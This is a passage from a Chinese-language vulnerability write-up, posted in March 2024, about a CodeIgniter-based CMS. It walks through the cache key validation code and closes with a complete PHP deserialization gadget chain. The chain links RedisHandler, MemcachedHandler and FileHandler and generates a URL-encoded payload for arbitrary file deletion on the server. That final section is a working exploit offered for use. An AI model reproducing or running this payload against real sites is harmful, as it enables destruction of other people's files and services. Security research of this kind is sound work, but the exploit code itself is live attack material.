</span>{
<span class=hljs-keyword>if</span> (! is_string(<span class=hljs-variable>$key</span>)) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> <span class=hljs-built_in>InvalidArgumentException</span>(<span class=hljs-string>'Cache key must be a string'</span>);
}
<span class=hljs-keyword>if</span> (<span class=hljs-variable>$key</span> === <span class=hljs-string>''</span>) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> <span class=hljs-built_in>InvalidArgumentException</span>(<span class=hljs-string>'Cache key cannot be empty.'</span>);
}
<span class=hljs-variable>$reserved</span> = config(<span class=hljs-string>'Cache'</span>)-&gt;reservedCharacters ?? <span class=hljs-built_in>self</span>::RESERVED_CHARACTERS;
<span class=hljs-keyword>if</span> (<span class=hljs-variable>$reserved</span> &amp;&amp; strpbrk(<span class=hljs-variable>$key</span>, <span class=hljs-variable>$reserved</span>) !== <span class=hljs-literal>false</span>) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> <span class=hljs-built_in>InvalidArgumentException</span>(<span class=hljs-string>'Cache key contains reserved characters '</span> . <span class=hljs-variable>$reserved</span>);
}
<span class=hljs-comment>// If the key with prefix exceeds the length then return the hashed version </span>
<span class=hljs-keyword>return</span> strlen(<span class=hljs-variable>$prefix</span> . <span class=hljs-variable>$key</span>) &gt; <span class=hljs-built_in>static</span>::MAX_KEY_LENGTH ? <span class=hljs-variable>$prefix</span> . md5(<span class=hljs-variable>$key</span>) : <span class=hljs-variable>$prefix</span> . <span class=hljs-variable>$key</span>;
}
</code></pre>
<p blockindex=67>这个方法,在确保传入的$key不为空并且是字符串的前提下才能正常进行下面操作</p>
<pre blockindex=68><code class="hljs language-php"><span class=hljs-variable>$reserved</span> = config(<span class=hljs-string>'Cache'</span>)-&gt;reservedCharacters ?? <span class=hljs-built_in>self</span>::RESERVED_CHARACTERS;
</code></pre>
<p blockindex=69>获取配置中的保留字符列表。如果 <code>config('Cache')-&gt;reservedCharacters</code> 存在,则将其赋值给 <code>$reserved</code>;否则,使用 <code>self::RESERVED_CHARACTERS</code> 的默认值。</p>
<pre blockindex=70><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-keyword>string</span> <span class=hljs-variable>$reservedCharacters</span> = <span class=hljs-string>'{}()/\\@:'</span>;
</code></pre>
<pre blockindex=71><code class="hljs language-php"><span class=hljs-keyword>return</span> strlen(<span class=hljs-variable>$prefix</span> . <span class=hljs-variable>$key</span>) &gt; <span class=hljs-built_in>static</span>::MAX_KEY_LENGTH ? <span class=hljs-variable>$prefix</span> . md5(<span class=hljs-variable>$key</span>) : <span class=hljs-variable>$prefix</span> . <span class=hljs-variable>$key</span>;
</code></pre>
<ul blockindex=72>
<li>首先,计算添加前缀后键的长度是否大于预定义的最大键长度 <code>static::MAX_KEY_LENGTH</code></li>
<li>如果大于最大键长度,则返回将 <code>$prefix . md5($key)</code> 处理后的哈希值作为缓存键。这是为了确保最终返回的键不会超过最大键长度。</li>
<li>如果小于等于最大键长度,则返回将 <code>$prefix . $key</code> 拼接作为缓存键</li>
</ul>
<p blockindex=73>经过测试在delete方法中如果传入<code>$key</code>为要删除的文件名,在经过<code>validateKey</code>处理后不会对key照常改变直接返回<code>key</code>,而<code>$this-&gt;prefix</code>不需要修改,默认就行</p>
<p blockindex=74>在拼接文件路径的<code>$this-&gt;path</code> 可以是绝对路径也可以是相对路径默认是public目录下</p>
<p blockindex=75>在写exp的过程中遇到一个问题就是类的属性都是<code>protected</code>类型的,不能直接修改值</p>
<p blockindex=76>因为这个cms安装条件是PHP7.4+ , 由于<code>PHP7.1+</code>对属性类型不敏感 可以将<code>protected</code>修改为<code>public</code>类型</p>
<h2 blockindex=77>最后的exp</h2>
<pre blockindex=78><code class="hljs language-php"><span class=hljs-comment>//任意文件删除 </span>
<span class=hljs-meta>&lt;?php</span>
<span class=hljs-keyword>namespace</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Cache</span>\<span class=hljs-title>Handlers</span>;
<span class=hljs-keyword>use</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Session</span>\<span class=hljs-title>Handlers</span>\<span class=hljs-title>BaseHandler</span>;
<span class=hljs-keyword>use</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Session</span>\<span class=hljs-title>Handlers</span>\<span class=hljs-title>MemcachedHandler</span>;
<span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>RedisHandler</span> <span class=hljs-keyword>extends</span> <span class=hljs-title>BaseHandler</span>
</span>{
<span class=hljs-keyword>public</span> <span class=hljs-variable>$redis</span>;
<span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>__construct</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-keyword>$this</span>-&gt;redis =<span class=hljs-keyword>new</span> MemcachedHandler();
}
}
<span class=hljs-keyword>namespace</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Session</span>\<span class=hljs-title>Handlers</span>;
<span class=hljs-keyword>use</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Session</span>\<span class=hljs-title>Handlers</span>\<span class=hljs-title>BaseHandler</span>;
<span class=hljs-keyword>use</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Cache</span>\<span class=hljs-title>Handlers</span>\<span class=hljs-title>FileHandler</span>;
<span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>MemcachedHandler</span> <span class=hljs-keyword>extends</span> <span class=hljs-title>BaseHandler</span>
</span>{
<span class=hljs-keyword>public</span> <span class=hljs-variable>$memcached</span> ;
<span class=hljs-keyword>public</span> <span class=hljs-variable>$lockKey</span> ;
<span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>__construct</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-keyword>$this</span>-&gt;memcached=<span class=hljs-keyword>new</span> FileHandler();
<span class=hljs-keyword>$this</span>-&gt;lockKey = <span class=hljs-string>"1.txt"</span>; <span class=hljs-comment>//文件名 </span>
}
}
<span class=hljs-keyword>namespace</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Session</span>\<span class=hljs-title>Handlers</span>;
<span class=hljs-keyword>abstract</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>BaseHandler</span>
</span>{
}
<span class=hljs-keyword>namespace</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Cache</span>\<span class=hljs-title>Handlers</span>;
<span class=hljs-keyword>use</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Session</span>\<span class=hljs-title>Handlers</span>\<span class=hljs-title>BaseHandler</span>;
<span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>FileHandler</span> <span class=hljs-keyword>extends</span> <span class=hljs-title>BaseHandler</span>
</span>{
<span class=hljs-keyword>public</span> <span class=hljs-variable>$path</span>;
<span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>__construct</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-keyword>$this</span>-&gt;path=<span class=hljs-string>"./"</span>; <span class=hljs-comment>//路径 </span>
}
}
<span class=hljs-keyword>use</span> <span class=hljs-title>CodeIgniter</span>\<span class=hljs-title>Cache</span>\<span class=hljs-title>Handlers</span>\<span class=hljs-title>RedisHandler</span>;
<span class=hljs-variable>$str</span> = serialize(<span class=hljs-keyword>new</span> RedisHandler());
<span class=hljs-variable>$newStr</span> = str\_replace(<span class=hljs-string>'\\'</span>, <span class=hljs-string>'\\\\'</span>, <span class=hljs-variable>$str</span>);
<span class=hljs-keyword>echo</span> urlencode(<span class=hljs-variable>$newStr</span>).<span class=hljs-string>"\n"</span>;
</code></pre>
<h2 blockindex=79>END</h2></div></div>
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2024-03-13 09:44:03
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>